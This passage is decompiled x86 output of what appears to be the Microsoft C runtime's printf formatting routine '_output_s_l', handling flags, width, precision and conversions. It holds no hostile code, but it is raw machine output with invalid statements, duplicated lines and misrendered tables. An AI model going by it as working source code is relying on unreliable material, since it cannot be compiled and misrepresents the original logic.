                            															__edx = __ebp - 0x24c;
                            															__eax =  *(__ebp + 8);
                            															__ecx =  *(__ebp - 0x2c4);
                            															__eax = E00422790(0x30,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
                            														}
                            													}
                            													__eflags =  *(__ebp - 0xc);
                            													if( *(__ebp - 0xc) == 0) {
                            														L212:
                            														__ecx = __ebp - 0x24c;
                            														__edx =  *(__ebp + 8);
                            														__eax =  *(__ebp - 0x24);
                            														__ecx =  *(__ebp - 4);
                            														__eax = E004227D0(__ecx, __ecx,  *(__ebp - 0x24),  *(__ebp + 8), __ebp - 0x24c);
                            														goto L213;
                            													} else {
                            														L204:
                            														__eflags =  *(__ebp - 0x24);
                            														if( *(__ebp - 0x24) <= 0) {
                            															goto L212;
                            														}
                            														L205:
                            														 *(__ebp - 0x2dc) = 0;
                            														__edx =  *(__ebp - 4);
                            														 *(__ebp - 0x2c8) =  *(__ebp - 4);
                            														__eax =  *(__ebp - 0x24);
                            														 *(__ebp - 0x2cc) =  *(__ebp - 0x24);
                            														while(1) {
                            															L206:
                            															__ecx =  *(__ebp - 0x2cc);
                            															 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
                            															 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
                            															__eflags = __ecx;
                            															if(__ecx == 0) {
                            																break;
                            															}
                            															L207:
                            															__eax =  *(__ebp - 0x2c8);
                            															 *(__ebp - 0x32e) =  *( *(__ebp - 0x2c8));
                            															__edx =  *(__ebp - 0x32e) & 0x0000ffff;
                            															__eax = __ebp - 0x2d8;
                            															__ecx = __ebp - 0x2d0;
                            															 *(__ebp - 0x2dc) = E004212A0(__ebp - 0x2d0, __ebp - 0x2d8, 6,  *(__ebp - 0x32e) & 0x0000ffff);
                            															 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
                            															 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
                            															__eflags =  *(__ebp - 0x2dc);
                            															if( *(__ebp - 0x2dc) != 0) {
                            																L209:
                            																 *(__ebp - 0x24c) = 0xffffffff;
                            																break;
                            															}
                            															L208:
                            															__eflags =  *(__ebp - 0x2d0);
                            															if( *(__ebp - 0x2d0) != 0) {
                            																L210:
                            																__eax = __ebp - 0x24c;
                            																__ecx =  *(__ebp + 8);
                            																__edx =  *(__ebp - 0x2d0);
                            																__ebp - 0x2d8 = E004227D0( *(__ebp + 8), __ebp - 0x2d8,  *(__ebp - 0x2d0),  *(__ebp + 8), __ebp - 0x24c);
                            																continue;
                            															}
                            															goto L209;
                            														}
                            														L211:
                            														L213:
                            														__eflags =  *(__ebp - 0x24c);
                            														if( *(__ebp - 0x24c) >= 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
                            															__eflags =  *(__ebp - 0x10) & 0x00000004;
                            															if(( *(__ebp - 0x10) & 0x00000004) != 0) {
                            																__eax = __ebp - 0x24c;
                            																__ecx =  *(__ebp + 8);
                            																__edx =  *(__ebp - 0x2c4);
                            																__eax = E00422790(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
                            															}
                            														}
                            													}
                            													L216:
                            													__eflags =  *(__ebp - 0x20);
                            													if( *(__ebp - 0x20) != 0) {
                            														 *(__ebp - 0x20) = L0040C240( *(__ebp - 0x20), 2);
                            														 *(__ebp - 0x20) = 0;
                            													}
                            													while(1) {
                            														L218:
                            														 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
                            														_t547 =  *(_t557 - 0x251);
                            														 *(_t557 + 0xc) =  *(_t557 + 0xc) + 1;
                            														if( *(_t557 - 0x251) == 0 ||  *(_t557 - 0x24c) < 0) {
                            															break;
                            														} else {
                            															if( *(_t557 - 0x251) < 0x20 ||  *(_t557 - 0x251) > 0x78) {
                            																 *(_t557 - 0x310) = 0;
                            															} else {
                            																 *(_t557 - 0x310) =  *( *(_t557 - 0x251) + L"pecifier\", 0)") & 0xf;
                            															}
                            														}
                            														L7:
                            														 *(_t557 - 0x250) =  *(_t557 - 0x310);
                            														_t506 =  *(_t557 - 0x250) * 9;
                            														_t536 =  *(_t557 - 0x25c);
                            														_t547 = ( *(_t506 + _t536 + 0x4083d0) & 0x000000ff) >> 4;
                            														 *(_t557 - 0x25c) = ( *(_t506 + _t536 + 0x4083d0) & 0x000000ff) >> 4;
                            														if( *(_t557 - 0x25c) != 8) {
                            															L16:
                            															 *(_t557 - 0x318) =  *(_t557 - 0x25c);
                            															__eflags =  *(_t557 - 0x318) - 7;
                            															if( *(_t557 - 0x318) > 7) {
                            																continue;
                            															}
                            															L17:
                            															switch( *((intOrPtr*)( *(_t557 - 0x318) * 4 +  &M004225E0))) {
                            																case 0:
                            																	L18:
                            																	 *(_t557 - 0xc) = 0;
                            																	_t509 = E00419390( *(_t557 - 0x251) & 0x000000ff, E0040D3B0(_t557 - 0x40));
                            																	_t562 = _t559 + 8;
                            																	__eflags = _t509;
                            																	if(_t509 == 0) {
                            																		L24:
                            																		E004226F0( *(_t557 - 0x251) & 0x000000ff,  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
                            																		_t559 = _t562 + 0xc;
                            																		goto L218;
                            																	} else {
                            																		E004226F0( *((intOrPtr*)(_t557 + 8)),  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
                            																		_t562 = _t562 + 0xc;
                            																		_t541 =  *( *(_t557 + 0xc));
                            																		 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
                            																		_t547 =  *(_t557 + 0xc) + 1;
                            																		__eflags = _t547;
                            																		 *(_t557 + 0xc) = _t547;
                            																		asm("sbb eax, eax");
                            																		 *(_t557 - 0x27c) =  ~( ~( *(_t557 - 0x251)));
                            																		if(_t547 == 0) {
                            																			_push(L"(ch != _T(\'\\0\'))");
                            																			_push(0);
                            																			_push(0x486);
                            																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																			_push(2);
                            																			_t521 = L0040E1A0();
                            																			_t562 = _t562 + 0x14;
                            																			__eflags = _t521 - 1;
                            																			if(_t521 == 1) {
                            																				asm("int3");
                            																			}
                            																		}
                            																		L22:
                            																		__eflags =  *(_t557 - 0x27c);
                            																		if( *(_t557 - 0x27c) != 0) {
                            																			goto L24;
                            																		} else {
                            																			 *((intOrPtr*)(L0040EC70(_t541))) = 0x16;
                            																			E00411A50(_t528, _t541, _t555, _t556, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
                            																			 *(_t557 - 0x2f4) = 0xffffffff;
                            																			E0040D380(_t557 - 0x40);
                            																			_t499 =  *(_t557 - 0x2f4);
                            																			goto L229;
                            																		}
                            																	}
                            																case 1:
                            																	L25:
                            																	 *(__ebp - 0x2c) = 0;
                            																	__edx =  *(__ebp - 0x2c);
                            																	 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            																	__eax =  *(__ebp - 0x28);
                            																	 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            																	__ecx =  *(__ebp - 0x18);
                            																	 *(__ebp - 0x1c) = __ecx;
                            																	 *(__ebp - 0x10) = 0;
                            																	 *(__ebp - 0x30) = 0xffffffff;
                            																	 *(__ebp - 0xc) = 0;
                            																	goto L218;
                            																case 2:
                            																	L26:
                            																	__edx =  *((char*)(__ebp - 0x251));
                            																	 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
                            																	 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            																	 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            																	__eflags =  *(__ebp - 0x31c) - 0x10;
                            																	if( *(__ebp - 0x31c) > 0x10) {
                            																		goto L33;
                            																	}
                            																	L27:
                            																	__ecx =  *(__ebp - 0x31c);
                            																	_t72 = __ecx + 0x422618; // 0x498d04
                            																	__edx =  *_t72 & 0x000000ff;
                            																	switch( *((intOrPtr*)(( *_t72 & 0x000000ff) * 4 +  &M00422600))) {
                            																		case 0:
                            																			goto L30;
                            																		case 1:
                            																			goto L31;
                            																		case 2:
                            																			goto L29;
                            																		case 3:
                            																			goto L28;
                            																		case 4:
                            																			goto L32;
                            																		case 5:
                            																			goto L33;
                            																	}
                            																case 3:
                            																	L34:
                            																	__edx =  *((char*)(__ebp - 0x251));
                            																	__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            																	if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																		__eax =  *(__ebp - 0x18);
                            																		__eax =  *(__ebp - 0x18) * 0xa;
                            																		__eflags = __eax;
                            																		__ecx =  *((char*)(__ebp - 0x251));
                            																		_t96 = __ecx - 0x30; // -48
                            																		__edx = __eax + _t96;
                            																		 *(__ebp - 0x18) = __eax + _t96;
                            																	} else {
                            																		__eax = __ebp + 0x14;
                            																		 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																		__eflags =  *(__ebp - 0x18);
                            																		if( *(__ebp - 0x18) < 0) {
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) | 0x00000004;
                            																			__eflags = __ecx;
                            																			 *(__ebp - 0x10) = __ecx;
                            																			 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																			 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																		}
                            																	}
                            																	goto L218;
                            																case 4:
                            																	L40:
                            																	 *(__ebp - 0x30) = 0;
                            																	goto L218;
                            																case 5:
                            																	L41:
                            																	__eax =  *((char*)(__ebp - 0x251));
                            																	__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            																	if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																		__edx =  *(__ebp - 0x30);
                            																		__edx =  *(__ebp - 0x30) * 0xa;
                            																		__eflags = __edx;
                            																		_t107 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
                            																		__ecx = __edx + _t107;
                            																		 *(__ebp - 0x30) = __ecx;
                            																	} else {
                            																		__ecx = __ebp + 0x14;
                            																		 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																		__eflags =  *(__ebp - 0x30);
                            																		if( *(__ebp - 0x30) < 0) {
                            																			 *(__ebp - 0x30) = 0xffffffff;
                            																		}
                            																	}
                            																	goto L218;
                            																case 6:
                            																	L47:
                            																	__edx =  *((char*)(__ebp - 0x251));
                            																	 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
                            																	 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            																	 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            																	__eflags =  *(__ebp - 0x320) - 0x2e;
                            																	if( *(__ebp - 0x320) > 0x2e) {
                            																		L70:
                            																		goto L218;
                            																	}
                            																	L48:
                            																	__ecx =  *(__ebp - 0x320);
                            																	_t115 = __ecx + 0x422640; // 0x1e4e9003
                            																	__edx =  *_t115 & 0x000000ff;
                            																	switch( *((intOrPtr*)(( *_t115 & 0x000000ff) * 4 +  &M0042262C))) {
                            																		case 0:
                            																			L53:
                            																			__edx =  *(__ebp + 0xc);
                            																			__eax =  *( *(__ebp + 0xc));
                            																			__eflags =  *( *(__ebp + 0xc)) - 0x36;
                            																			if( *( *(__ebp + 0xc)) != 0x36) {
                            																				L56:
                            																				__edx =  *(__ebp + 0xc);
                            																				__eax =  *( *(__ebp + 0xc));
                            																				__eflags =  *( *(__ebp + 0xc)) - 0x33;
                            																				if( *( *(__ebp + 0xc)) != 0x33) {
                            																					L59:
                            																					__edx =  *(__ebp + 0xc);
                            																					__eax =  *( *(__ebp + 0xc));
                            																					__eflags =  *( *(__ebp + 0xc)) - 0x64;
                            																					if( *( *(__ebp + 0xc)) == 0x64) {
                            																						L65:
                            																						L67:
                            																						goto L70;
                            																					}
                            																					L60:
                            																					__ecx =  *(__ebp + 0xc);
                            																					__edx =  *__ecx;
                            																					__eflags =  *__ecx - 0x69;
                            																					if( *__ecx == 0x69) {
                            																						goto L65;
                            																					}
                            																					L61:
                            																					__eax =  *(__ebp + 0xc);
                            																					__ecx =  *( *(__ebp + 0xc));
                            																					__eflags = __ecx - 0x6f;
                            																					if(__ecx == 0x6f) {
                            																						goto L65;
                            																					}
                            																					L62:
                            																					__edx =  *(__ebp + 0xc);
                            																					__eax =  *( *(__ebp + 0xc));
                            																					__eflags =  *( *(__ebp + 0xc)) - 0x75;
                            																					if( *( *(__ebp + 0xc)) == 0x75) {
                            																						goto L65;
                            																					}
                            																					L63:
                            																					__ecx =  *(__ebp + 0xc);
                            																					__edx =  *__ecx;
                            																					__eflags =  *__ecx - 0x78;
                            																					if( *__ecx == 0x78) {
                            																						goto L65;
                            																					}
                            																					L64:
                            																					__eax =  *(__ebp + 0xc);
                            																					__ecx =  *( *(__ebp + 0xc));
                            																					__eflags = __ecx - 0x58;
                            																					if(__ecx != 0x58) {
                            																						 *(__ebp - 0x25c) = 0;
                            																						goto L18;
                            																					}
                            																					goto L65;
                            																				}
                            																				L57:
                            																				__ecx =  *(__ebp + 0xc);
                            																				__edx =  *((char*)(__ecx + 1));
                            																				__eflags =  *((char*)(__ecx + 1)) - 0x32;
                            																				if( *((char*)(__ecx + 1)) != 0x32) {
                            																					goto L59;
                            																				} else {
                            																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																					__ecx =  *(__ebp - 0x10);
                            																					__ecx =  *(__ebp - 0x10) & 0xffff7fff;
                            																					 *(__ebp - 0x10) = __ecx;
                            																					goto L67;
                            																				}
                            																			}
                            																			L54:
                            																			__ecx =  *(__ebp + 0xc);
                            																			__edx =  *((char*)(__ecx + 1));
                            																			__eflags =  *((char*)(__ecx + 1)) - 0x34;
                            																			if( *((char*)(__ecx + 1)) != 0x34) {
                            																				goto L56;
                            																			} else {
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																				__ecx =  *(__ebp - 0x10);
                            																				__ecx =  *(__ebp - 0x10) | 0x00008000;
                            																				 *(__ebp - 0x10) = __ecx;
                            																				goto L67;
                            																			}
                            																		case 1:
                            																			L68:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																			goto L70;
                            																		case 2:
                            																			L49:
                            																			__eax =  *(__ebp + 0xc);
                            																			__ecx =  *( *(__ebp + 0xc));
                            																			__eflags = __ecx - 0x6c;
                            																			if(__ecx != 0x6c) {
                            																				__ecx =  *(__ebp - 0x10);
                            																				__ecx =  *(__ebp - 0x10) | 0x00000010;
                            																				__eflags = __ecx;
                            																				 *(__ebp - 0x10) = __ecx;
                            																			} else {
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																			}
                            																			goto L70;
                            																		case 3:
                            																			L69:
                            																			__eax =  *(__ebp - 0x10);
                            																			__eax =  *(__ebp - 0x10) | 0x00000800;
                            																			__eflags = __eax;
                            																			 *(__ebp - 0x10) = __eax;
                            																			goto L70;
                            																		case 4:
                            																			goto L70;
                            																	}
                            																case 7:
                            																	L71:
                            																	__ecx =  *((char*)(__ebp - 0x251));
                            																	 *(__ebp - 0x324) = __ecx;
                            																	 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            																	 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            																	__eflags =  *(__ebp - 0x324) - 0x37;
                            																	if( *(__ebp - 0x324) > 0x37) {
                            																		while(1) {
                            																			L190:
                            																			__eflags =  *(__ebp - 0x28);
                            																			if( *(__ebp - 0x28) != 0) {
                            																				goto L216;
                            																			}
                            																			goto L191;
                            																		}
                            																	}
                            																	L72:
                            																	_t156 =  *(__ebp - 0x324) + 0x4226ac; // 0xcccccc0d
                            																	__ecx =  *_t156 & 0x000000ff;
                            																	switch( *((intOrPtr*)(__ecx * 4 +  &M00422670))) {
                            																		case 0:
                            																			L123:
                            																			 *(__ebp - 0x2c) = 1;
                            																			__ecx =  *((char*)(__ebp - 0x251));
                            																			__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
                            																			__eflags = __ecx;
                            																			 *((char*)(__ebp - 0x251)) = __cl;
                            																			goto L124;
                            																		case 1:
                            																			L73:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				__eax =  *(__ebp - 0x10);
                            																				__eax =  *(__ebp - 0x10) | 0x00000800;
                            																				__eflags = __eax;
                            																				 *(__ebp - 0x10) = __eax;
                            																			}
                            																			goto L75;
                            																		case 2:
                            																			L88:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				__ecx =  *(__ebp - 0x10);
                            																				__ecx =  *(__ebp - 0x10) | 0x00000800;
                            																				__eflags = __ecx;
                            																				 *(__ebp - 0x10) = __ecx;
                            																			}
                            																			goto L90;
                            																		case 3:
                            																			L146:
                            																			 *(__ebp - 0x260) = 7;
                            																			goto L148;
                            																		case 4:
                            																			L81:
                            																			__eax = __ebp + 0x14;
                            																			 *(__ebp - 0x288) = E0041C290(__ebp + 0x14);
                            																			__eflags =  *(__ebp - 0x288);
                            																			if( *(__ebp - 0x288) == 0) {
                            																				L83:
                            																				__edx =  *0x60b4f0; // 0x407424
                            																				 *(__ebp - 4) = __edx;
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																				L87:
                            																				goto L190;
                            																			}
                            																			L82:
                            																			__ecx =  *(__ebp - 0x288);
                            																			__eflags =  *(__ecx + 4);
                            																			if( *(__ecx + 4) != 0) {
                            																				L84:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000800;
                            																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																					 *(__ebp - 0xc) = 0;
                            																					__edx =  *(__ebp - 0x288);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x288);
                            																					__edx =  *__ecx;
                            																					 *(__ebp - 0x24) =  *__ecx;
                            																				} else {
                            																					__edx =  *(__ebp - 0x288);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x288);
                            																					__eax =  *__ecx;
                            																					asm("cdq");
                            																					 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0xc) = 1;
                            																				}
                            																				goto L87;
                            																			}
                            																			goto L83;
                            																		case 5:
                            																			L124:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			__eax = __ebp - 0x248;
                            																			 *(__ebp - 4) = __ebp - 0x248;
                            																			 *(__ebp - 0x44) = 0x200;
                            																			__eflags =  *(__ebp - 0x30);
                            																			if( *(__ebp - 0x30) >= 0) {
                            																				L126:
                            																				__eflags =  *(__ebp - 0x30);
                            																				if( *(__ebp - 0x30) != 0) {
                            																					L129:
                            																					__eflags =  *(__ebp - 0x30) - 0x200;
                            																					if( *(__ebp - 0x30) > 0x200) {
                            																						 *(__ebp - 0x30) = 0x200;
                            																					}
                            																					L131:
                            																					__eflags =  *(__ebp - 0x30) - 0xa3;
                            																					if( *(__ebp - 0x30) > 0xa3) {
                            																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																						 *(__ebp - 0x20) = L0040B5C0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																						__eflags =  *(__ebp - 0x20);
                            																						if( *(__ebp - 0x20) == 0) {
                            																							 *(__ebp - 0x30) = 0xa3;
                            																						} else {
                            																							__eax =  *(__ebp - 0x20);
                            																							 *(__ebp - 4) =  *(__ebp - 0x20);
                            																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																						}
                            																					}
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					__eax =  *(__ebp + 0x14);
                            																					__ecx =  *(__eax - 8);
                            																					__edx =  *(__eax - 4);
                            																					 *(__ebp - 0x2a8) =  *(__eax - 8);
                            																					 *(__ebp - 0x2a4) =  *(__eax - 4);
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__eax =  *(__ebp - 0x2c);
                            																					_push( *(__ebp - 0x2c));
                            																					__ecx =  *(__ebp - 0x30);
                            																					_push( *(__ebp - 0x30));
                            																					__edx =  *((char*)(__ebp - 0x251));
                            																					_push( *((char*)(__ebp - 0x251)));
                            																					__eax =  *(__ebp - 0x44);
                            																					_push( *(__ebp - 0x44));
                            																					__ecx =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__edx = __ebp - 0x2a8;
                            																					_push(__ebp - 0x2a8);
                            																					__eax =  *0x60b3cc; // 0x7e8c4bdb
                            																					__eax =  *__eax();
                            																					__esp = __esp + 0x1c;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																					if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																						__eflags =  *(__ebp - 0x30);
                            																						if( *(__ebp - 0x30) == 0) {
                            																							__ecx = __ebp - 0x40;
                            																							_push(E0040D3B0(__ebp - 0x40));
                            																							__edx =  *(__ebp - 4);
                            																							_push( *(__ebp - 4));
                            																							__eax =  *0x60b3d8; // 0x7e8c4bdb
                            																							__eax =  *__eax();
                            																							__esp = __esp + 8;
                            																						}
                            																					}
                            																					__ecx =  *((char*)(__ebp - 0x251));
                            																					__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
                            																					if( *((char*)(__ebp - 0x251)) == 0x67) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																							__ecx = __ebp - 0x40;
                            																							_push(E0040D3B0(__ebp - 0x40));
                            																							__eax =  *(__ebp - 4);
                            																							_push( *(__ebp - 4));
                            																							__ecx =  *0x60b3d4; // 0x7e8c4bdb
                            																							E00410200(__ecx) =  *__eax();
                            																							__esp = __esp + 8;
                            																						}
                            																					}
                            																					__edx =  *(__ebp - 4);
                            																					__eax =  *( *(__ebp - 4));
                            																					__eflags =  *( *(__ebp - 4)) - 0x2d;
                            																					if( *( *(__ebp - 4)) == 0x2d) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						__edx =  *(__ebp - 4);
                            																						__edx =  *(__ebp - 4) + 1;
                            																						__eflags = __edx;
                            																						 *(__ebp - 4) = __edx;
                            																					}
                            																					__eax =  *(__ebp - 4);
                            																					 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																					do {
                            																						L190:
                            																						__eflags =  *(__ebp - 0x28);
                            																						if( *(__ebp - 0x28) != 0) {
                            																							goto L216;
                            																						}
                            																						goto L191;
                            																					} while ( *(__ebp - 0x324) > 0x37);
                            																					goto L72;
                            																				}
                            																				L127:
                            																				__ecx =  *((char*)(__ebp - 0x251));
                            																				__eflags = __ecx - 0x67;
                            																				if(__ecx != 0x67) {
                            																					goto L129;
                            																				}
                            																				L128:
                            																				 *(__ebp - 0x30) = 1;
                            																				goto L131;
                            																			}
                            																			L125:
                            																			 *(__ebp - 0x30) = 6;
                            																			goto L131;
                            																		case 6:
                            																			L75:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000810;
                            																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																				__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																				 *(__ebp - 0x284) = __ax;
                            																				__cl =  *(__ebp - 0x284);
                            																				 *(__ebp - 0x248) = __cl;
                            																				 *(__ebp - 0x24) = 1;
                            																			} else {
                            																				 *(__ebp - 0x280) = 0;
                            																				__edx = __ebp + 0x14;
                            																				__eax = E0041C2D0(__ebp + 0x14);
                            																				 *(__ebp - 0x258) = __ax;
                            																				__eax =  *(__ebp - 0x258) & 0x0000ffff;
                            																				__ecx = __ebp - 0x248;
                            																				__edx = __ebp - 0x24;
                            																				 *(__ebp - 0x280) = E004212A0(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
                            																				__eflags =  *(__ebp - 0x280);
                            																				if( *(__ebp - 0x280) != 0) {
                            																					 *(__ebp - 0x28) = 1;
                            																				}
                            																			}
                            																			__edx = __ebp - 0x248;
                            																			 *(__ebp - 4) = __ebp - 0x248;
                            																			while(1) {
                            																				L190:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L216;
                            																				}
                            																				goto L191;
                            																			}
                            																		case 7:
                            																			L144:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 8) = 0xa;
                            																			goto L153;
                            																		case 8:
                            																			L109:
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 0x298) = E0041C290(__ebp + 0x14);
                            																			__eax = E00420F80();
                            																			__eflags = __eax;
                            																			if(__eax != 0) {
                            																				L119:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																					__edx =  *(__ebp - 0x298);
                            																					__eax =  *(__ebp - 0x24c);
                            																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																				} else {
                            																					__eax =  *(__ebp - 0x298);
                            																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																				}
                            																				 *(__ebp - 0x28) = 1;
                            																				while(1) {
                            																					L190:
                            																					__eflags =  *(__ebp - 0x28);
                            																					if( *(__ebp - 0x28) != 0) {
                            																						goto L216;
                            																					}
                            																					goto L191;
                            																				}
                            																			}
                            																			L110:
                            																			__edx = 0;
                            																			__eflags = 0;
                            																			if(0 == 0) {
                            																				 *(__ebp - 0x32c) = 0;
                            																			} else {
                            																				 *(__ebp - 0x32c) = 1;
                            																			}
                            																			__eax =  *(__ebp - 0x32c);
                            																			 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
                            																			__eflags =  *(__ebp - 0x29c);
                            																			if( *(__ebp - 0x29c) == 0) {
                            																				_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																				_push(0);
                            																				_push(0x695);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				__eax = L0040E1A0();
                            																				__esp = __esp + 0x14;
                            																				__eflags = __eax - 1;
                            																				if(__eax == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			__eflags =  *(__ebp - 0x29c);
                            																			if( *(__ebp - 0x29c) != 0) {
                            																				L118:
                            																				while(1) {
                            																					L190:
                            																					__eflags =  *(__ebp - 0x28);
                            																					if( *(__ebp - 0x28) != 0) {
                            																						goto L216;
                            																					}
                            																					goto L191;
                            																				}
                            																			} else {
                            																				L117:
                            																				 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																				__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																				 *(__ebp - 0x2f8) = 0xffffffff;
                            																				__ecx = __ebp - 0x40;
                            																				__eax = E0040D380(__ecx);
                            																				__eax =  *(__ebp - 0x2f8);
                            																				goto L229;
                            																			}
                            																		case 9:
                            																			L151:
                            																			 *(__ebp - 8) = 8;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				__edx =  *(__ebp - 0x10);
                            																				__edx =  *(__ebp - 0x10) | 0x00000200;
                            																				__eflags = __edx;
                            																				 *(__ebp - 0x10) = __edx;
                            																			}
                            																			L153:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																			__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																				__eflags =  *(__ebp - 0x10) & 0x00001000;
